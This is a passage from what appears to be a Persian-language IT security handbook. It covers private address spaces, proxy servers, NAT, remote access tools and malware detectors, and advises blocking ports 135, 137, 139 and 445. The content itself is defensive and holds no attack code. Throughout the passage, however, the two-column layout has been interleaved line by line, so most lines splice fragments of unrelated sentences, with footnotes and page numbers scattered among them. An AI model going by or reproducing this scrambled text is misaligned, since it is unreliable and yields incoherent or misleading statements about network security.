‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺭﺍ‬ ‫•‬ ‫ﻫﻴﭽﻜﺲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺑﺼﻮﺭﺕ ﻣﺠﺰﺍ ﺍﺯ ﺑﻘﻴﻪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﺗـﺎ ﻧﺘﻮﺍﻧﻨـﺪ ﺑﻄـﻮﺭ‬ ‫ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ‪.‬‬
‫ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﺳـﺎﻳﺮ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺭﺗﺒـﺎﻁ ﺩﺍﺷـﺘﻪ‬ ‫ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﻫـﻴﭻ ﺑـﺴﺘﻪﺍﻱ ﺍﺯ ﭘﻮﺭﺗﻬـﺎﻱ ‪،137 ،135‬‬ ‫•‬
‫‪ ،139‬ﻭ ‪ TCP/UDP 445‬ﻋﺒــﻮﺭ ﻛﻨــﺪ‪ ،‬ﻣﮕــﺮ ﺁﻧﻜــﻪ‬

‫‪111 Private Address Spaces‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٩٦‬‬

‫ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﻫﺎﻱ ‪ proxy‬ﻫﻤﭽﻨﻴﻦ ﻣﻲ ﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺍﻱ‬ ‫ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺑﺮﺧﻲ‬
‫ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻋﺎﺩﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺁﻧﻬﺎ ﺑﺮﺍﻱ‬ ‫ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﻛﻨﺘﺮﻝ ﻧﻮﻉ ﺗﺮﺍﻓﻴﻚ ﻋﺒﻮﺭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻳﺎ ﺗﺴﻬﻴﻞ ﺍﺭﺗﺒﺎﻃﺎﺕ‬ ‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺩﺭ ﻣﺤﻴﻂ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺧﺘـﺼﺎﺹ‬ ‫•‬
‫ﻛﺎﺭﺑﺮ ﻭ ﺷـﺒﻜﻪ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﻧـﺪ‪ .‬ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬ ‫ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺑﻪ ﺗﻌﺪﺍﺩ ﻛـﺎﻓﻲ‬
‫‪ proxy‬ﻭﺏ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺻﻔﺤﺎﺕ ﺩﺭﺧﻮﺍﺳـﺖﺷـﺪﻩ ﺭﺍ‬ ‫ﺁﺩﺭﺱ ‪ IP‬ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺑـﻪ ﻫﻤـﺔ ﻣﺎﺷـﻴﻨﻬﺎ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻛـﺎﺭﺑﺮ ﺩﻳﮕـﺮﻱ ﻫﻤـﺎﻥ‬ ‫ﺍﺧﺘﺼﺎﺹ ﺩﻫﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﻏﻠﺐ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ‬
‫ﺻﻔﺤﻪ ﺭﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻧﺴﺨﻪﻫﺎﻱ ﻧﮕﻬـﺪﺍﺭﻱ ﺷـﺪﻩ ﺭﺍ‬ ‫ﺗﻮﺳﻌﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻠـﻲ ﭼﻨـﺪ ﺳـﺎﻝ‬
‫ﺑﺮﺍﻱ ﻭﻱ ﺍﺭﺳﺎﻝ ﻣﻲﻧﻤﺎﻳﺪ؛ ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻣـﻮﺭﺩ‬ ‫ﺑﻌﺪ ﺍﺯ ﺍﻳﺠﺎﺩ ﺷﺒﻜﻪ ﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ‬
‫ﻧﻴﺎﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻛﺎﻫﺶ ﻣﻲ ﻳﺎﺑﺪ‪ .‬ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ ‪caching‬‬
‫ﺑﻮﺟﻮﺩ ﺁﻣﺪ‪.‬‬
‫ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻣﺸﺨـﺼﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻣـﻮﺭﺩ‬
‫‪١١٣‬‬
‫‪NAT‬‬ ‫ﺍﺳــﺘﻔﺎﺩﻩ ﻗــﺮﺍﺭ ﻧﻤــﻲﮔﻴﺮﻧــﺪ‪ .‬ﺍﻳــﻦ ﺁﺩﺭﺳــﻬﺎ "ﻓــﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ‬
‫ﺧﺼﻮﺻﻲ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺩﻭ ﻣﻮﺭﺩ ﺫﻛـﺮ ﺷـﺪﻩ‬
‫‪ NAT‬ﺟﺎﻳﮕﺎﻫﻲ ﺑﻴﻦ ﺷـﺒﻜﺔ ﻣﺤﻠـﻲ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺍﺭﺩ ﻭ‬
‫ﺑﻜﺎﺭ ﺭﻭﻧـﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻓـﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ‬
‫ﻣﺸﺎﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ proxy‬ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺷﺒﻜﺔ ﻣﺤﻠﻲ‬
‫ﺧﺼﻮﺻﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺑﺼﻮﺭﺕ ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺗﺒـﺎﻁ‬
‫ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺧﺼﻮﺻﻲ ﺩﺭ ﺁﻥ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ ﻣـﺮﺗﺒﻂ‬
‫ﺑﺮﻗﺮﺍﺭ ﻧﻤﻲﻛﻨﻨﺪ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻧﻴﺎﺯ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺍﮔﺮﭼﻪ‬
‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﭘﻴﺎﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ NAT‬ﺍﺯ ﺷﺒﻜﺔ‬
‫ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻔــﻲ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺍﺯ ﻣﺠﻤﻮﻋــﻪ ﺁﺩﺭﺳــﻬﺎﻱ‬
‫ﻣﺤﻠﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲ ﺷﻮﺩ‪ NAT ،‬ﺁﻧﺮﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻣﺸﺎﺑﻬﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﻫﻴﭽﻴﻚ ﺍﺯ ﺁﻧﻬﺎ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺳـﺎﻳﺮﻳﻦ‬
‫ﺍﺯ ﺁﺩﺭﺱ ‪ IP‬ﺧــﻮﺩ ﺍﺭﺳــﺎﻝ ﻣــﻲﻛﻨــﺪ ﻭ ﺍﻳﻨﻄــﻮﺭ ﻭﺍﻧﻤــﻮﺩ‬
‫ﺭﺍ ﺑﺒﻴﻨﻨــﺪ ﻭ ﻟــﺬﺍ ﺍﻳــﻦ ﺁﺩﺭﺳــﻬﺎﻱ ﻣــﺸﺎﺑﻪ ﻫــﻴﭻ ﻣــﺸﻜﻠﻲ ﭘﺪﻳــﺪ‬
‫ﻣﻲ ﻛﻨﺪ ﻛﻪ ﭘﻴﺎﻡ ﺍﺯ ﭘـﻮﺭﺗﻲ ﻓﺮﺳـﺘﺎﺩﻩ ﺷـﺪﻩ ﻛـﻪ ﺩﺭﺣـﺎﻝ‬
‫ﻧﻤﻲﺁﻭﺭﻧﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻴﺴﺖ‪ ،‬ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﺎﺳﺦ ﭘﻴﺎﻡ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ‪،‬‬
‫ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺍﺻﻠﻲ ﺩﺭ ﺷﺒﻜﺔ ﻣﺤﻠـﻲ ﺑـﺎﺯ ﻣـﻲﮔـﺮﺩﺩ‪NAT .‬‬ ‫ﺩﻭ ﺭﻭﺵ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﺁﺩﺭﺱ‬
‫ﺷﺒﻴﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ proxy‬ﻋﻤﻞ ﻣﻲﻛﻨـﺪ‪ ،‬ﺍﻣـﺎ ﺑـﺮﺍﻱ‬ ‫ﺧﺼﻮﺻﻲ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ‪:‬‬
‫ﻫﻤﺔ ﺍﻧﻮﺍﻉ ﺗﺮﺍﻓﻴﻚ )ﻭ ﻧﻪ ﻓﻘﻂ ﺗﺮﺍﻓﻴﻚ ‪ (web‬ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ‬ ‫‪١١٢‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪Proxy‬‬
‫ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ ‪ caching‬ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ ‪ proxy‬ﻧـﻮﻉ ﺧﺎﺻـﻲ ﺍﺯ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ proxy‬ﻭ ‪ NAT‬ﻫﺮ ﺩﻭ ﻣﺜﻞ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ‬ ‫ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﺩﺍﺭﺍﻱ ﻳﻚ ﺁﺩﺭﺱ ﺩﺭ ﻓـﻀﺎﻱ‬
‫ﺁﺗــﺶ ﻫــﺴﺘﻨﺪ ﻭ ﺍﺯ ﺩﺳــﺘﮕﺎﻫﻬﺎﻳﻲ ﻛــﻪ ﺩﺭ ﻓــﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ‬ ‫ﺁﺩﺭﺱ ﺧﺼﻮﺻﻲ ﺍﺳﺖ ﺍﻣﺎ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﺍﺭﺗﺒﺎﻁ ﻭ ﺁﺩﺭﺱ‬
‫ﺧﺼﻮﺻﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺑﻴﺮﻭﻧـﻲ ﻣﺤﺎﻓﻈـﺖ‬ ‫ﺛﺎﻧﻮﻳﻪ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺍﺭﺩ‪ .‬ﺍﮔـﺮ ﻛـﺎﺭﺑﺮﻱ‬
‫ﻣﻲﻛﻨﻨﺪ‪.‬‬ ‫ﺑﺨﻮﺍﻫﺪ ﺍﺯ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺑﺎ ﺁﺩﺭﺳﻲ ﺩﺭ ﻓـﻀﺎﻱ ﺧـﺼﻮﺻﻲ‬
‫ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ‪ ،‬ﭘﻴﺎﻡ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ‪ ،‬ﻣﺪﻳﺮﻳﺖ‪،‬‬
‫‪ proxy‬ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﻣﻲﺧﻮﺍﻫﺪ ﻛﻪ ﭘﻴﺎﻡ ﺭﺍ ﺑـﻪ‬
‫ﻭ ﺭﺍﻫﺒﺮﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‬ ‫ﻣﻘﺼﺪ ﻣﻮﺭﺩ ﻧﻈﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺳﺎﻧﺪ‪ .‬ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ‬
‫ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،١١٤‬ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻣــﺪﻳﺮﻳﺖ ﺍﺯ ﺭﺍﻩ‬ ‫ﺩﺭﺧﻮﺍﺳﺖ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﻓﺮﺳـﺘﺎﺩﻥ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧـﺖ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﺩﻭﺭ‪ ١١٥‬ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺭﺍﻫﺒﺮﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ١١٦‬ﺍﻳﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ ﻓـﺮﺍﻫﻢ‬ ‫ﻣﻲﻛﻨﺪ ﻭ ﺯﻣﺎﻧﻴﻜﻪ ﭘﺎﺳﺦ ﺁﻥ ﺑﺎﺯﮔـﺸﺖ ﺁﻧـﺮﺍ ﺑـﻪ ﺩﺳـﺘﮕﺎﻩ‬
‫ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﺧـﻂ ﺗﻠﻔـﻦ ﻳـﺎ‬ ‫ﺩﺭﺧﻮﺍﺳﺖﻛﻨﻨﺪﻩ ﺑﺎﺯﭘﺲ ﻣﻲﻓﺮﺳﺘﺪ‪.‬‬

‫‪113‬‬ ‫‪Network Address Translation‬‬


‫‪114‬‬ ‫‪Remote Access Tools‬‬
‫‪115‬‬ ‫‪Remote Management Tools‬‬
‫‪116‬‬ ‫‪Remote Administration Tools‬‬ ‫‪112 Proxy Servers‬‬
‫‪٩٧‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻨﺎﺳﺐ ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻜﺎﺭ‬ ‫ﺍﻳﻨﺘﺮﻧﺖ ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ‬
‫ﻣﻲﺑﺮﻳﺪ‪.‬‬ ‫ﻣﺘﺼﻞ ﻣﻲ ﺷﻮﻳﺪ ﻣﺜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘﺸﺖ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺩﺳـﺘﮕﺎﻩ‬
‫ﺧﻮﺩ ﻧﺸﺴﺘﻪﺍﻳﺪ‪.‬‬
‫ﻼ ﺍﻳﻤﻦ ﻫـﺴﺘﻴﺪ؛‬ ‫ﺣﺎﻝ ﺍﮔﺮ ﺳﺆﺍﻝ ﺷﻮﺩ ﺑﺎ ﺗﻤﺎﻡ ﺍﻳﻦ ﻛﺎﺭﻫﺎ ﺁﻳﺎ ﻛﺎﻣ ﹰ‬
‫ﺦ ﻣﺜﺒﺖ ﺍﺯ ﺍﻃﻤﻴﻨﺎﻥ ﺻﺪ ﺩﺭﺻﺪﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴـﺴﺖ‪.‬‬ ‫ﺑﺎﺯ ﻫﻢ ﭘﺎﺳ ﹺ‬
‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﭼﻬﺎﺭﻡ‪:‬‬
‫ﻫﻤﻴﺸﻪ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻗﺒﻞ ﺍﺯ ﺍﺭﺍﺋـﻪ ﺭﺍﻩﺣـﻞ ﺑـﺮﺍﻱ‬
‫ﺍﮔﺮ ﺍﺯ ﺍﻣﻜﺎﻧﺎﺕ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ‬
‫ﻳﻚ ﺍﺷﻜﺎﻝ‪ ،‬ﺷﻤﺎ ﺍﺯ ﻫﻤـﺎﻥ ﺍﺷـﻜﺎﻝ ﺁﺳـﻴﺐ ﺑﺒﻴﻨﻴـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺯ ﺍﻳﻤﻨﻲ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻛـﻪ ﻧﺘـﻮﺍﻥ ﺁﻧـﺮﺍ‬
‫ﻻﺯﻡ )ﻧﺎﻣﻬـــﺎﻱ ﻛـــﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫـــﺎﻱ ﻋﺒـــﻮﺭ ﻣﻨﺎﺳـــﺐ(‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﻼ ﺍﻳﻤﻦ ﺩﺍﻧﺴﺖ‪.‬‬‫ﻛﺎﻣ ﹰ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ ،‬ﺗﺎ ﻣﻬﺎﺟﻤﻴﻦ ﻧﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﻋﻠﻴﻪ‬
‫"ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ" ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﻳـﺎﻓﺘﻦ‬
‫ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﻜﻮﻙ ‪ -‬ﺻـﺮﻓﻨﻈﺮ ﺍﺯ ﭼﮕـﻮﻧﮕﻲ ﻧـﺼﺐ ﺁﻧﻬـﺎ ‪-‬‬
‫ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﻋﻤﻠﻜﺮﺩ‬ ‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻣﻬﻢ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﻧـﺪ‪.‬‬
‫ﺁﻧﻬﺎ ﺑﺎ ﺟﺴﺘﺠﻮﮔﺮﻫﺎﻱ ﻭﻳﺮﻭﺱ ﺗﺪﺍﺧﻞ ﺩﺍﺭﺩ‪ ،‬ﺯﻳﺮﺍ ﻫﺮ ﺩﻭﻱ ﺁﻧﻬـﺎ‬ ‫ﺍﺯ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪:‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺩﻳـﺴﻚ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻧﻤـﻮﺩﻩ‪،‬‬ ‫ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﺩﺳﺘﺮﺳـﻲ ﻓﻴﺰﻳﻜـﻲ ﻧﺪﺍﺭﻳـﺪ‬ ‫•‬
‫ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨـﺪ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛﻠﻴـﺪﻱ ﺳﻴـﺴﺘﻢ ﺑـﺼﻮﺭﺕ‬ ‫ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ‪.‬‬
‫ﻣﺨﻔﻴﺎﻧﻪ ﺗﻐﻴﻴﺮ ﻧﻜﺮﺩﻩ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻭ‬
‫ﺍﻳﻦ ﺁﺷـﻜﺎﺭﮔﺮﻫﺎ ‪plug-in‬ﻫـﺎ ﻭ ‪add-on‬ﻫـﺎﻱ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺭﺍ‬ ‫ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ ﻭ ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ‬ ‫ﺍﺟﺎﺯﻩ ﻣﻲ ﺩﻫﻨﺪ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ ﻣﻌﺎﻳﻨـﻪ ﺑـﻪ ﻳـﻚ‬ ‫•‬
‫ﻭ ﻳﺎ ﺑﺮﺧﻼﻑ ﻗﻮﺍﻧﻴﻦ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﺳﺖ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣـﻲﻧﻤﺎﻳﻨـﺪ‪.‬‬ ‫ﻣﺘﺨﺼﺺ ﻧﺸﺎﻥ ﺩﻫﻴﺪ؛ ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﻭﻱ ﺭﺍ ﺑﻪ ﻣﺤﻞ ﻛـﺎﺭ‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺍﺭﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﺯ ﺑـﻴﻦ ﺑـﺮﺩﻥ‬ ‫ﺧﻮﺩ ﺑﺒﺮﻳﺪ‪.‬‬
‫ﺑﺪﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲﺷﺪﻩ ﻧﻴﺰ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ‬ ‫•‬
‫ﺗﻨﻬﺎ ﺑﺮ ﺭﻭﻱ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎ‬
